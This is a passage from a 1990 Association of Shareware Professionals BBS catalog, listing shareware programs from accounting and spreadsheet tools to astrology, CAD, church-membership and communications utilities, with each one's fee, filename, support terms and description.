to + make sure that the shareware principle works for you. + If you are unable to resolve a shareware-related problem + with an ASP member by contacting the member directly, + ASP may be able to help. The ASP Ombudsman can help you + resolve a dispute or problem with an ASP member, but + does not provide technical support for members' + products. Please write to the ASP Ombudsman at P.O. Box + 5786, Bellevue, WA 98006 or send a Compuserve message + via easyplex to ASP Ombudsman 70007,3536' + + + Tips & Hints + + If you have questions about a particular product, check in the + index to see if there is a cross-reference for the program. An + entire appendix is devoted to authors' addresses & telephone + numbers. You might be able to get some help from them. + + New or updated programs are marked with '[***]' in the far right + corner. You can use your favorite word processor to hunt for + that string so you can see what's changed since last month. + + The 'BBS filename' shown with each product is the author's + preferred spelling for the filename and it usually has some sort + of connection to the program's version number. If your local BBS + has an earlier version of the program, it will probably be under + a different filename. Even if it is the current version, some + people upload the file as a different filename. You would be + wise to search for variations in spelling. Your local BBS sysop + can tell you how to do this. + + ASP authors are only human, and they sometimes forget to supply + all information before this list goes out. We apologize if you + see '??' where there should be a piece of information. + + Some applications are contained in multiple files, but you should + be warned of this in the description. + + Be sure to check the file size BEFORE you begin downloading. + Many of these products are bigger than 100k, and some are bigger + than 200k. Find out how big the file is before you go for it. + + A few applications have what can be described as 'conditional' + fees. Some may only need to be registered if the program will be + used in making a profit. Others may offer source code to the + program for a higher fee. The price you see here may not always + be the price you have to pay -- it could be higher or lower. It + 'pays' to read the fine print in the documentation provided with + any shareware application. + + Enjoy the catalog. + + -- page 3 -- + + + + Accounting + + Program: AS-EASY-AS + Version: 4.00N (03/30/90) + Registration fee: $50 + $5 s&h + BBS filename: AEA40N.EXE + User support: Bound manual, latest version, quarterly newsletter, + three months of free phone/mail support, dedicated TRIUS BBS, + reduced price updates + Description: + AS-EASY-AS:Powerful Spreadsheet Program with Extraordinary + Features * 8192 rows, 256 cols * WKS & WK1 compatibility * + Goalseeking * Full Macro language implementation * Math-Stat- + Finance-Logic-Text-Date and User Defined functions * * + Goalseeking * Superb Graphics (10 types, Log scales, etc.) * 9/ + 24 pin, LaserJet, PIC file support * Direct dBASE Import/Export + * Macro Recording * Spreadsheet Linking * Matrix Operations * + much more... + + Program: DAYO AP + Version: 1.3 (07/15/90) + Registration fee: $25 + BBS filename: DAYOVE.ZIP + User support: Latest enhancements is mailed out; voice support; + notices of upgrades, free upgrades via mail (you pay postage & + handling), or via modem. + Description: + DAYO AP (ACCOUNTS PAYABLE) is the 'final chapter' to the + processing and maintenance of all your Payables. DAYO AP's key + mission is to process/post your purchase orders, however, many + other routines have been provided, ie: Expense Maintenance, + 1099 MISC Forms, Purchase Clearing, Vendor Maintenance, Hand/ + Manual Checks, Batch Checks, Recurring Checks, Unlimited Bank + Accounts, Unlimited Check Printing Formats and over 21 Reports. + + Program: DAYO AR + Version: 1.3 (07/15/90) + Registration fee: $25 + BBS filename: DAYOAE.ZIP + User support: Latest enhancements is mailed out; voice support; + notices of upgrades, free upgrades via mail (you pay postage & + handling), or via modem. + Description: + DAYO AR (ACCOUNTS RECEIVABLE) is the 'final chapter' to the + processing and maintenance of all your Receivables. DAYO AR + includes routines to handle cash receipts, customers, invoice + types, terms, taxcodes, sales persons, and more. Many reports + are included (ie: Ageing, Customer, Sales...). There is a + routine to print Statements (ie: SMART, 90, 60, 30 days), and + another one to create and print 'non' standard invoices. HP + Laser forms are also provided. + + -- page 4 -- + + + + Program: DAYO EOP + Version: 1.3 (07/15/90) + Registration fee: $25 + BBS filename: DAYOEE.ZIP + User support: Latest enhancements is mailed out; voice support; + notices of upgrades, free upgrades via mail (you pay postage & + handling), or via modem. + Description: + DAYO EOP (End of Period Pack & Inventory) contains routines + that are normally run at the end of a reporting period (ie: + Month). DAYO EOP permits you to permanently remove deleted + records from the Accounts Receivable (AR) and Accounts Payable + (AP) databases, and to erase old report text files. There is + also a routine for performing a Physical Inventory. Many + reports are included (ie: AR Ageing, AP Summary, Inventory + Movement). + + Program: DAYO GL + Version: 1.3 (07/15/90) + Registration fee: $25 + BBS filename: DAYOGE.ZIP + User support: Latest enhancements is mailed out; voice support; + notices of upgrades, free upgrades via mail (you pay postage & + handling), or via modem. + Description: + DAYO GL (GENERAL LEDGER) provides a means to manage and report + company finances. DAYO GL is totally integrated with the other + DAYO packages. Features include computer generated posting, + multiuser, double entry, export data, 20+ reports, budget + management and unlimited accounts. + + Program: KISBILL + Version: B1.O (01/01/90) + Registration fee: $25 + BBS filename: KISBILL.ZIP + User support: Latest enhancements is mailed out; voice support; + notices of upgrades, free upgrades via mail (you pay postage & + handling), or via modem. Clipper (tm) source included! + Description: + KISBILL is a simple to use and operate billing and invoicing + system. This product was produced to provide a means of billing + a client or customer. Very little setup is required (ie: Your + Company Name, and address, tax rates). Databases are Dbase (tm) + compatible. KISBILL is multi-user, able to operate on most of + the PC based networks, ie: Novell (tm). A simple database + management module is also included. Will print an invoice in a + laser or regular printer format... + + -- page 5 -- + + + + Program: PC-Calc+ + Version: 2.0 + Registration fee: $69.95 + BBS filename: PCCAL1.ARC, PCCAL2.ARC, PCCAL3.ARC in Compuserve + PCVEN forum + User support: Telephone, Mail, FAX, ButtonNet (BBS), Compuserve + PCVEN. All support is free for one year following date of + purchase. PCVEN Compuserve support is free to everyone. + Description: + PC-Calc+ is a full-featured spreadsheet program with graphics, + split screens, 80x87 support, macros, over 75 built-in + functions and more. PCCAL1.ARC contains the spreadsheet program + and help files. PCCAL2.ARC contains the Utility Disk files. + PCCAL3.ARC contains the manual. You must "un-arc" these files + before using PC-Calc+. REQUIREMENTS: IBM PC or compatible; + 280K available RAM (more recommended); DOS 2.0 or higher; 2 + floppies or 1 hard disk. See PCCALC.INF for more information. + + Program: PC-DEAL + Version: 2.4 (07/01/90) + Registration fee: $40 + BBS filename: pcdeal.* + User support: registered users receive copy of latest release, + support available by mail & telephone, notification of future + releases. + Description: + A ledger accounting program suitable for a small business or + organization as well as personal use. 300 accounts; enter + unlimited double entry transactions, retain 1,200 on file; up + to twelve months open for entry or editing; 12 reports with on + screen browsing & output to printer or disk file. Bar graphs; + data export; monthly budgets. Sixty day trial period. + + Program: ProQube Lite + Version: 1.00 + Registration fee: $25 + BBS filename: PQLITE.* + User support: voice support, BBS support, CompuServe support + Description: + ProQube Lite is a 3D spreadsheet. It provides 512 pages, and + the 3D worksheet can be rotated. ProQube Lite also provides + file linking, direct import/export of 1-2-3 and dBase files, + over 80 @functions, a powerful macro language, macro recorder, + mouse support, visual point & shoot file manager, and much + more. ProQube Lite is from the same company as QubeCalc, and is + much more powerful than its predecessor. Registration $25. + + + Archivers + + Program: SHEZ + Version: 5.1 (12/05/89) + Registration fee: $20 + BBS filename: SHEZ51.ZIP + + -- page 6 -- + + + + User support: Support is offered on Comuserve via Easyplex. + Address questions to [76266,2634]. Support is also offered on the + Directory Assistance BBS (707) 538-8710 via SHEZ conference. + Description: + SHEZ is a user friendly SHELL designed to make working with + compressed files quick and painless. SHEZ supports ARC, ZIP, + PAK, SDN, LZH, and ZOO compressed file formats. It allows you to + convert from one compressed format to another, view print, + update, add, extract, move, files in the compressed file. It + will also convert to/from self extracting files Registered users + receive a large data version of SHEZ that is capable of handling + 1800 file/compressed file 2000 per DIR. + + + ASP files + + Program: ASP application form (text file) + Version: January 1990 + Registration fee: $free + BBS filename: APPLIC.FRM or APPLIC.ZIP + User support: not applicable + Description: + This is the statement of purpose and an application form for + membership in the Association of Shareware Professionals + ("ASP"), a trade association for shareware programmers. + + Program: ASP BBS catalog (text file) + th + Version: 25 Edition, 10/4/90 (updated monthly) + Registration fee: $free + BBS filename: ASP3404.ARC + User support: not applicable + Description: + An official product catalog for the Association of Shareware + Professionals (ASP). These programs can be downloaded from + nationwide bulletin boards and tested on a try-before-you-buy + basis. This catalog describes each product. Entries are + grouped by subject and cross-referenced in an index. A monthly + update file is created for those people who already have the + previous edition of this catalog. See below. + + Program: ASP BBS catalog updates (text file) + th + Version: 25 Edition, 10/4/90 (updated monthly) + Registration fee: $free + BBS filename: UPD3404.ARC + User support: not applicable + Description: + th + An official update to the 24 Edition product catalog for the + Association of Shareware Professionals (ASP). This file will + bring you up to date on the changes in the current edition of + the catalog. There's no need to download the whole catalog + again. See above. + + -- page 7 -- + + + + Astrology & New Age + + Program: Aura Reading [***] + Version: 1.1 (08/??/90) + Registration fee: $29 + BBS filename: WEBSTER.ZIP + User support: Mail or phone, newsletter + Description: + Based on the work and research of internationally-known psychic + entertainer Richard Webster, "Aura Reading" helps you learn + what to look for when attempting to see the human aura. "Quick + Numerology" uses a special method of Numerology, popular in + Australia and New Zealand, to give a quick but pointed + personality profile. It's a great way to meet people and make + friends! + + Program: BOOK OF CHANGES [***] + Version: 1.0 (08/??/90) + Registration fee: $24 + BBS filename: BOOK1.ZIP + User support: By mail or phone, newsletter + receive upgrades + Description: + The I Ching (Book of Changes), a classic of Chinese literature, + is a book of divinations originating in antiquity. Its poetic + messages are used for both fortune-telling & their insight into + our role in the world. Toss coins or sticks to create a pattern + of 6 lines for interpretation. The I Ching's "yin & yang" + philosophy fits the "yes & no" or "0 & 1" mentality of the + computer. Edit the text to incorporate your favorite + translation, or add your own comments. Readings can printed or + saved. + + Program: BY THE NUMBERS [***] + Version: 4.3 (08/??/90) + Registration fee: $29 + BBS filename: NUMBERS.ZIP + User support: Mail or phone, newsletter + Description: + Use the philosophy of Numerology to analyze your name & + birthdate for their symbolic meaning & metaphysical vibrations, + 10 separate personality elements, forecast for coming year. + Save readings for fu- ture reference. Professional-looking + reports can be edited for truly personalized interpretations. + This has been our most popular program for nearly three years! + + -- page 8 -- + + + + Program: CRYSTAL BALL + Version: 2.1 + Registration fee: $19.00 + BBS filename: CRYSTAL.ZIP + User support: Current disk is mailed out; mail support; some + voice support; registration includes subscription to newsletter + Description: + Based on Thomas A. Easton's article "Psychics, Computers and + Psychic Computers" in The Skeptical Inquirer, this program + makes predictions and answers questions, with a sometimes + enigmatic style reminscent of ancient Greek oracles. Subject + matter may be selected by the user for predictions of personal + interest. + + Program: PERSONAL TAROT(tm) [***] + Version: 1.0 (08/??/90) + Registration fee: $24 + BBS filename: TAROT10.ZIP + User support: Mail or phone, newsletter + Description: + Automates shuffling & dealing, builds a 10-card layout, + displays card descriptions & meanings. Completely menu-driven. + You choose the method for shuffling, selecting a Significator + card & displaying info. The program has 2 variations on the + traditional Celtic Cross layout. Edit the card descriptions & + interpretations to conform with your favorite Tarot deck and + published references; add your own comments, separate from the + card descriptions, which may be included in readings at your + option. Readings can be edited for truly personalized reports. + + Program: FORTUNE TELLER + Version: 2.6 + Registration fee: $29.00 + BBS filename: FORTUNE.ZIP + User support: Current disk is mailed out; mail support; some + voice support; registration includes subscription to newsletter + Description: + A potpourri of divination and fortune telling techniques. + Offers three separate playing card methods, dice method, short + numerology, runes. A history and explanation of each method is + provided. + + Program: GEOMANCY + Version: 2.2 + Registration fee: $29.00 + BBS filename: GEOMANCY.ZIP + User support: Current version is mailed out; mail support; some + voice support; registration includes newsletter subscription + Description: + GEOMANCY is an ancient system of divination, sometimes + associated with black magic, that creates an Astro-Geomantic + chart based on your area of inquiry. Provides explanation of + geomantic figures and charts, saves readings in database. + + -- page 9 -- + + + + Astronomy & Geography + + Program: MAYAN CALENDAR + Version: 3.3 + Registration fee: $29.00 + BBS filename: MAYAN.ZIP + User support: Newest version is mailed; mail support; some voice + support; registration includes newsletter subscription + Description: + Uses the astronomical knowledge of the ancient Mayans to + convert a modern calendar date to its Mayan equivalent (or vice + versa), and gives Mayan astrological interpretation. Includes + history of the Mayan calendar and chart of month & day names. + + Program: SHUTTLE v 4; space shuttle tracking program + Version: 4 (01/09/90) + Registration fee: $10 + BBS filename: STS26.EXE + User support: Inquiries responded to in writting. + Description: + SHUTTLE tracking program version 4 by LCDR R.L. Lloyd. Designed + to track any Space Shuttle. Now permits On Orbit Changes. EGA/ + CGA graphics show the track of shuttle in real or compressed + time. Allows Tracking of future and imaginary missions. Fun way + to learn how one orbital variable effects another. Set the + Orbital Period or Altitude and Angle for launch or take the + defaults and watch the mission track. + + Program: WORLD29 + Version: 2.97 + Registration fee: $10 + BBS filename: WORLD29.ZIP + User support: By CIS E-Plex or via mail + Description: + WORLD29 V. 2.97. Maps of Countries of the world. Centered on + Lat & Long OR on selected cities. Distance Calculator. Track + anything that can be given a Lat & Long. Over 150 national + capitals - all 50 state capitals -selected additional cities - + Now enter location in degrees & Minutes, Choice of Political + Boundaries, More EGA color, Name the City shows surrounding + Capitals. ASP Shareware. Self extracting. + + -- page 10 -- + + + + Backup/restore + + Program: LCG/Remind + Version: 1.7 (3/1/90) + Registration Fee: $12.95 + BBS filename: LCGR17.* + User support: Customer support available through a number of + electronic mail networks / BBS systems. Registration good for + ALL future versions. + Description: + LCG/Remind v 1.7 is a small utility designed to remind you when + it is time to back-up your hard disk, or to automate any task + based on time, day of week, month, or the number of days since + last executed. With its animated windows, log file ability, + and many options it is flexible, intelligent, attractive. * + New * Trigger on the LAST weekday of the month. Display + percent disk full. + + + BBS software + + Program: EIS (Electronic Information System) BBS + Version: 2.0 (08/01/89) + Registration fee: $89.00 + BBS filename: EIS2DSK1.ZIP and EIS2DSK2.ZIP + User support: Support BBS at (401) 732-2169. Compuserve users + address questions to 72537,3361. Registered owners get access + to private support forums on the support BBS. Reduced-cost + upgrades. + Description: + EIS is an extremely fast, powerful, and configurible BBS + system. An unlimited number of menus & submenus under menus + are allowed. 999 message bases and 999 nodes supported. Makes + an excellent public BBS system, in-house e-mail system, + customer support, or on-line information system. NOTE: You + will also need the second EIS file, EIS2DSK2.ZIP. This file + contains important data files and documentation. + + -- page 11 -- + + + + Program: Searchlight BBS System + Version: 1.31 (08/26/89) + Registration fee: $35 + BBS filename: SLBBS31A.ZIP + User support: Registered users get latest version on disk, use of + support BBS, update notices. Extended versions include a + printed user manual (150 pages), free updates, support, add'l + utilities. + Description: + Searchlight is a full featured, full screen oriented bulletin + board and electronic mail system that's perfect for the home or + business user. Features include Wordstar compatible message + editor, error-free file transfers, personal mailboxes, friendly + interface with online help. Expandable via add-on DOORS system. + Compatible with a wide range of PC's, modems, and existing BBS + DOORs software. Multiuser versions and extended versions with + network support are available. + + + Business applications + + Program: DAYO BACK ORDERS + Version: 1.3 (07/15/90) + Registration fee: $25 + BBS filename: DAYOOE.ZIP + User support: Latest enhancements is mailed out; voice support; + notices of upgrades, free upgrades via mail (you pay postage & + handling), or via modem. + Description: + DAYO BACK ORDERS is the maintenance module for the processing + of all your customers/sales backorders. DAYO BO (working with + DAYO POS) determines and manages the filling (allocation) of + your customers backorders. It does this through an allocation + process that determines what backordered items are 'fillable' + because of receipts into the inventory. Creates the same type + invoices as DAYO POS. + + Program: DAYO MRP + Version: 1.3 (07/15/90) + Registration fee: $25 + BBS filename: DAYOWE.ZIP + User support: Latest enhancements is mailed out; voice support; + notices of upgrades, free upgrades via mail (you pay postage & + handling), or via modem. + Description: + DAYO MRP (MATERIALS REQUIREMENT PLANNING) is a routine designed + for manufacturers. DAYO MRP builds items (End Items) from item + (Components) in the inventory database. End Items can later be + placed into inventory for later sales. Supports multi-level + Bill of Materials. Features include automatic inventory posting + and creation of inventory adjustment records, databases are + dBase (tm) compatible, multiuser, and many reports. + + -- page 12 -- + + + + Program: DAYO POS + Version: 1.3 (07/15/90) + Registration fee: $25 + BBS filename: DAYOPE.ZIP + User support: Latest enhancements is mailed out; voice support; + notices of upgrades, free upgrades via mail (you pay postage & + handling), or via modem. + Description: + DAYO POS (Point of Sale) is a Billing and Invoicing application + for any size business. It is the DAYO module that permits you + to invoice out your products while keeping an accurate record + of all your 'sales'. Features include: Multiuser (ie: Novell), + Registers, Quote Interface (to DAYO Quotes), Templates Back + Orders, Data Entry Validation, Cash Drawers (Serial or + Parallel), Databases are dBase (tm) compatible, HP Laser + Special Invoices, and much more! + + Program: DAYO Price Book + Version: 1.3 (07/15/90) + Registration fee: $25 + BBS filename: DAYOBE.ZIP + User support: Latest enhancements is mailed out; voice support; + notices of upgrades, free upgrades via mail (you pay postage & + handling), or via modem. + Description: + DAYO Price Book is a system of creating and maintaining + specialized pricing for your customer/clients. Special + printouts (Price Books/Catalogs) may be printed to a standard + printer, or to a Hewlett Packard (tm) Laserjet or compatible. + It requires the presence of DAYO Inventory and DAYO POS (Point + of Sale) programs/databases. Special Price Book methods: Fixed, + Margin, List Discount. + + Program: DAYO QUOTES + Version: 1.3 (07/15/90) + Registration fee: $25 + BBS filename: DAYOQE.ZIP + User support: Latest enhancements is mailed out; voice support; + notices of upgrades, free upgrades via mail (you pay postage & + handling), or via modem. + Description: + DAYO Quotes creates sales order quotes based on the DAYO + Inventory, Customer, and other DAYO databases. Quotes can be + printed on a standard printer or a Hewlett Packard (tm) + Laserjet compatible printer. The quote can be printed on a pre- + printed form, on the Laser printer in a special laser format, + or as a standard/default form. DAYO Quotes is totally + integrated with DAYO POS. Templates (kits or bundles), are also + supported. + + -- page 13 -- + + + + Program: DAYO SMART REPORTS + Version: 1.3 (07/15/90) + Registration fee: $25 + BBS filename: DAYORE.ZIP + User support: Latest enhancements is mailed out; voice support; + notices of upgrades, free upgrades via mail (you pay postage & + handling), or via modem. + Description: + DAYO SMART REPORTS contain many reports/routines that will help + you manage your purchasing, inventory, invoices, backorders, + sales, and your databases. There are 22 Reports/ Lists/Routines + included in Smart Reports, ie: Single Warehouse, Inventory Zero + Price, Valuation Expanded, Inventory Zero Retail, ReOrder (2 + weeks), ReOrder (4 weeks), ReOrder (8 weeks), Negative Onhand, + StockLevel Shortage, Vendor List, StockLevel Over, and many + more! + + Program: Document Control + Version: 1.4 + Registration fee: $30 + BBS filename: DOCCON.* + User support: Current Disk is mailed out; Support via CIS and + Voice; Registration good for all future versions. Database + Structures and feeely available to Registered users. + Description: + Document Control is a document management system which allows + sequential storage of paper documents which can then be + retrieved by searching by up to 10 Keywords per entry, or by + ther Author. Also allows archival of Documents. Fully Menu + Driven, using Lightbar. Version 1.4 Allows Deleting Documents + from Archive Database. + + Program: FINANCE MANAGER II - PAYROLL + Version: 1.3f + Registration fee: $41.95 + BBS filename: FMPR.ARC or FMPR-EXE.ARC + User support: Free support (1 yr), Quarterly newsletters, FREE + latest version when you register, Additional modules, Bound + manuals, Low cost upgrades, Discounts, and make money with our + commission program. + Description: + FINANCE MANAGER II - PAYROLL This Payroll module is fully + integrated to the Finance Manager II General Ledger (see file + "FMGL.ARC"). Features include: Automatically calculates + deductions and liabilities, Override options, Manual or + Computer checks, User modifiable tax tables, W-2's, Hourly/ + Salary, Weekly, Biweekly, Semi- monthly, Monthly payroll, Many + reports. This is one of the easiest-to- use and complete + payroll tracking programs available. See FMAP-2.ARC, + + -- page 14 -- + + + + Program: MLSIM + Version: 1.1 (05/29/90) + Registration fee: $39 + BBS filename: MLM$VIEW.* + User support: Users receive current disk, printed manual in + convenient booklet form, and supplemental data files. Currently + offering free lifetime upgrades to registered users. Mail & + CIS support. + Description: + A no holds barred look at MLM. Demonstrates through simulation + how downlines can grow to yield a 6 figure income in a hostile, + competitive environment. Users input details of marketing plan, + product acceptance, promotional budgets & strategies. Program + projects downlines, costs, commissions, purchases, cash status + monthly for each individual member. Realistic model shows who + gets money, how much, when, and why. Warns of unprofitable + situations. DOS 640k, color text. + + Program: PDS*EPRICE + Version: 4.10 + Registration fee: $35.00 + BBS filename: PDSPRI.EXE + User support: Pre and Post Techinical support for at least 1 yr. + Latest version is mailed with low cost future upgrades. + Description: + PDS*EPRICE Electrical Contractors Price Update system Ver 4.09. + This system will convert the pricing service weekly updates + from 4 pricing services into the PDS*QUOTE Quote/Bid system + material format. Must be used in conjunction with PDS*QUOTE + Includes complete program, documentation and sample Price + Service data files. Requires hard disk. + + Program: PDS*QUOTE + Version: 4.10 + catalog report, backups, Footnotes, Mass Price Changes, output + to PRN & SDF files, F1 Help windows, Discount & List Prices, + Pop-Up Calendar and more. + Registration fee: $45.00 + BBS filename: PDSQUO.EXE + User support: Pre and Post Techinical support for at least 1 yr. + Latest version is mailed with low cost future upgrades. + Description: + PDS*QUOTE Quote/Bid system Version 4.10 is packed with features + for ANY type/size business from consulting to one person + contractors to small/large manufacturers. Using dBASE III+ + compatible files, Pull-Down menus, Point-&-Shoot Browse to + build quotes makes this system VERY easy to learn and use. + Complete software & manual. [ASP] User supported. + + -- page 15 -- + + + + Program: TimeStax [***] + Version: 2.3 (02/19/90) + Registration fee: $49.95 + BBS filename: TMSTAX23.ZIP + User support: Current disk is mailed out; CIS support@71071,1215; + voice support@408-255-4213; registration good for ALL future + st + releases (1 upgrade free) + Description: + TIMESTAX is a LAN-aware time management program for anyone who + needs to monitor how their time is spent. Lets you record all + activity by Date, Client, Project, and Task for any number of + employees. Features 8-line notes, auto timer, 5 levels of + reporting, popup windows, import/export utilities, smooth user + interface. Only 10 minutes to learn! For private consultants, + managers, and office workers. + + Program: ZIPKEY + Version: 1.00 + Registration fee: $30 per year; volume discounts available + BBS filename: ZK10.ZIP (main program), ZK0988.ZIP (database) + User support: Manual sent with registration; yearly Zip Code + updates (montly updates available for a fee); phone and BBS + support. + Description: + ZIPKEY is the smallest and fastest Zip Code lookup utility ever + created! Loads as a resident (TSR) program in just 19k and + lets you find the city & state for any Zip Code, and vice versa + (even if you don't know the state). Makes your programs think + you typed in the city/state/zip yourself, in any format you + choose. 43,000 cities listed in a 122k database -- under three + bytes per entry! Complete DOS INT 179 services let you discard + city/state fields in large databases. + + Program: ZPAY 3 Payroll System + Version: 3.0 + Registration fee: $69.95 + BBS filename: ZPAY31.ZIP & ZPAY32.ZIP + User support: Full telephone support for registered users. Will + answer all mail support questions as well. Compuserve + 70040,645. + Description: + The ZPAY 3 Payroll System is a full featured, stand alone + payroll package. Pull down menus with mouse support; full + context sensitive on-line help; pays hourly, salaried, + commissined, and tipped employees; prints checks, W2 forms, + 1099-MISC forms as well as payroll reports; support for Laser + printers as well as standard printers. Requires a hard drive + system, MS-DOS 2.0 or newer. Registration brings a 227 page + illustrated perfect bound manual and telephone support. Author + - Paul Mayer + + -- page 16 -- + + + + CAD/CAM software + + Program: CADET + Version: 2.0 (08/12/90) + Registration fee: $25 + BBS filename: CADET2.* + User support: Mail and electronic mail support (CompuServe and + BBS); Upgrade notices and discounts; Diskette with AutoLISP + source code available. + Description: + CADET v2.0 professional software system allows users to create + tables and edit both text and attributes in AutoCAD drawings. + Full-screen text editing * 99 lines x 255 characters * Pull- + down menu * Shortcut commands * Help screen * Status lines * + Search and replace * Find text * Cut and paste * Change style, + height and case * EGA/VGA support * Import and export text * + Works from within AutoCAD - stop retyping entire lines of text + to make simple changes, use CADET! + + Program: DRAFT CHOICE + Version: 1.3H (03/30/90) + Registration fee: $40 + $5 s&h + BBS filename: DC14H.EXE + User support: Bound manual, latest version, quarterly newsletter, + Utilities/Library disk, three months of free phone/mail + support, dedicated TRIUS BBS, reduced price updates... + Description: + DRAFT CHOICE is a full featured, affordable CAD Program from + TRIUS, the developers of AS-EASY-AS. Over 160 Drawing, Editing + and Viewing commands * Mouse/Keyboard Operation * 9/24 pin + Printer Support * Laserjet and HP Plotter Support * PIC files * + CGA/EGA & Herc Compatible * Undo Command * Scientific + Calculator * Animation, Semi-Auto Scaling * Much more... + + Program: PC-Draft-CAD + Version: 3.00 (4/15/90) + VGA, Super VGA and Hercules displays. Also, "virtual memory" + management automatically uses extended, expanded memory or pages + to disk as necessary. New price ($65). + Registration fee: $65 + BBS filename: PCDCAD1.EXE, PCDCAD2.EXE, PCDCAD3.3XE + User support: Current disks & typset manual is mailed; voice + suport; Bug fixes mailed to all users; upgrades cost $20. Email + support via Compuserve + Description: + PC-Draft-CAD is a full featured vector based CAD drafting + system with features found only in expensive commercial CAD + systems Automatic dimensions, unlimited layers, named objects + saved in group libraries, context sensitive help, output to + plotters, or Epson, LaserJet, DeskJet; exact scaling by feet- + inches/metric; keyboard macros; import bit-mapped images, + WordPerfect WPG, DXF files; export WPG, HPGL & GEM Draw format. + Also DL PCCAD2.EXE. Register for object libraries, file + conversion utils, manual. + + -- page 17 -- + + + + Calendars & clocks + + Program: DAYO CLOCK + Version: 1.3 (07/15/90) + Registration fee: $25 + BBS filename: DAYOCK.ZIP + User support: Latest enhancements is mailed out; voice support; + notices of upgrades, free upgrades via mail (you pay postage & + handling), or via modem. + Description: + DAYO CLOCK is a simple Clock display and optional alarm, that + can act as a simple job scheduler. Requires a CGA, EGA or + better graphic card & monitor. + + Program: SETTIME.COM + Version: 1.4 (08/17/90) + Registration fee: $20 + BBS filename: SETTIME.EXE + User support: Support available on CompuServe `70130,330', + American People Link `UNIQUESOFT', EXEC-PC `Charles Robertson', + 24hr 365day Fax support `817-249-4284' + Description: + SETTIME 1.4! It's better! It's easier to use! AND it's + smaller!?? + * sets DOS' time AND DATE + * US Naval Observatory Atomic Time + * 952 bytes (NOT over 100K like others!) + * $20 ($5 upgrade) + * DTM (569 bytes) "software backup clock" included + * Self-Extracting Archive + + + Church & religion + + Program: CMTS + Version: 2.0 (05/04/90) + Registration fee: $129 + BBS filename: CMTS2A.ZIP + User support: Current disk is mailed out with printed manual. + Support available through E-Mail on Compuserve, direct postal + mail, BBS (August 1990). Voice support is also available but + chargable annually. + Description: + An exceptionally powerful, yet very easy to use, full featured + Church Membership & Donation Tracking System. Donation module + provides extensive tracking of contributions by user-definable + fund categories, sound audit trail, multi-level security, + extensive reporting. Member module provides organization + rosters, member skill lists, special date reports(birthday + lists, etc.) labels by family, individual, org member, much + more! Pop-up context-sensitive help. CMTS2B.ZIP required also. + + -- page 18 -- + + + + Program: PDS*MEMBER + Version: 1.08 + Registration fee: $30.00 + BBS filename: PDSMEM.EXE + User support: Pre and Post Techinical support for at least 1 yr. + Latest version is mailed with low cost future upgrades. + Description: + PDS*MEMBER Church Membership & Giving system v 1.08 is packed + with features for any size/denomination of church. Tracks + members & children & allows FAST posting of ALL giving. Track + talents, jobs, positions with unlimited text window per member + with text search reporting. Many reports, labels & rotary card + file runs. Complete Attendance Tracking and Reporting. LOW + registration. Self-extract archive. + + + Command processors + + Program: 4DOS + Version: 3.01a (05/25/90) + Registration fee: $50 + BBS filename: 4DOS301A.ZIP + User support: $50 registration good for current version plus one + downloaded major upgrade; pay for additional upgrades. Tech + support via CIS PCVENB, Bix, BBS networks, mail, phone, fax. + Description: + 4DOS replaces COMMAND.COM for MS-DOS/PC-DOS. Enhances most DOS + commands, over 40 new commands. Command editing, history, + aliases, point-and-shoot file selection, high-speed batch + files, much more. 1989 PC Mag Tech Excellence Finalist (v + 2.21). COMMAND.COM compatible, DOS 2.0 and up, IBM PCs, PS/2s, + compatibles. Compatible with virtually all PC hardware and + software. Manual on CIS is in 4DOS3D.ZIP; for more info read + 4DOS.INF. Shipping $4 US, $5 Canada, $10 others. + + Program: 4EDIT [***] + Version: 1.04 + Registration fee: $15 + BBS filename: 4EDIT104.* + User support: Current disk is mailed out. Voice support; CIS + support; notification of upgrades. + Description: + 4EDIT is a full-screen editor for 4DOS file descriptions. It is + much more convenient than the 4DOS DESCRIBE command because you + can see the descriptions for all selected files at one time. + Create or edit descriptions for any grouping of files using + multiple filenames and extended wildcards, like 4DOS. Works + with all versions of 4DOS, including 3.01. Version 1.04, + uploaded by author. Also look at companion utility 4ZIP. + + -- page 19 -- + + + + Program: 4ZIP [***] + Version: 1.07 + Registration fee: $15 + BBS filename: 4ZIP107.* + User support: Current disk is mailed out. Voice support; CIS + support; notification of upgrades. + Description: + 4ZIP is a utility for 4DOS. Used with the PKWare file + compression program PKZIP, it save 4DOS file descriptions along + with the files as they are compressed. The included program + 4UNZIP, calls PKUnzip, and restores the descriptions to 4DOS as + each file is uncompressed. Select files to Zip or Unzip from a + full-screen list with extended wildcards, like 4DOS. Works with + all versions of 4DOS, including 3.01. Ver. 1.07, uploaded by + author. Also look at companion utility, 4EDIT. + + + Communications + + Program: Ease-Up + Version: 1.7 (09/10/89) + Registration fee: $20.00 + BBS filename: EUPC17.* + User support: Free technical support is offered to registered + users. Support is provided by major on-line services, telephone + or mail. Automatic notice of new releases. Most upgrades for + cost of shipping only. + Description: + Ease-Up is a full featured script generator that allows the + automating of uploading files to on-line services via the + script languages of several popular terminal programs. Scripts + are generated for CROSSTALK Mk4,TAPCIS, Qmodem & PROCOMM PLUS. + A sophisticated, yet intuitive interface makes Ease-Up easy to + use. No prior knowledge of script languages is needed to put + Ease-Up to work for you. Versions for CompuServe and GEnie are + available separately. + + Program: PCFMT + Version: 1.3 (03/03/89) + Registration fee: $15 + BBS filename: PCFMT.* + User support: Support available on CompuServe `70130,330', + American People Link `UNIQUESOFT', EXEC-PC `Charles Robertson', + 24hr 365day Fax support `817-249-4284' + Description: + PCFMT formats Procomm Plus Aspect files the way YOU want them. + Capitalize, lowercase, or uppercase keywords and/or labels and/ + or variables. Block structures indented evenly for easy + reading. Many user settable options. Turn formatting ON and OFF + inside a listing. Other features. + + -- page 20 -- + + + + Program: Profonedit Plus (or PFE+) + Version: 1.04 (03/05/90) + Registration fee: $15 + BBS filename: PFEPL104.* + User support: current disk mailed to registered users; support on + CIS, GEnie, InterLink echo; voice support for registered users + Description: + Profonedit Plus (PFE+) is THE Directory Processor for PROCOMM + PLUS and PROCOMM PLUS TD. PFE+ is to your .DIR files what Word* + et al are to your unfinished novel! PFE+ lets you edit, sort + (on up to 6 of 7 fields), insert, delete, move, exchange, + rearrange your .DIR to suit your needs rather than the + accidents of entry. Looks like PC+ and reads PCPLUS.PRM. Fully + context sensitive help. This version improves compatibility + with Datastorm Technology's SORTDIR utility. + + Program: Qanalyst [***] + Version: 2.05 (09/19/90) + Registration fee: $15 + BBS filename: QANA-205.ZIP + User support: current disk is mailed out; BBS support; voice + support; registration good for ALL future versions; can beta + test upcoming versions. + Description: + "Qanalyst" analyzes Qmodem v4.2 log files so you know how much + you're SPENDING on modem calls. Keeps 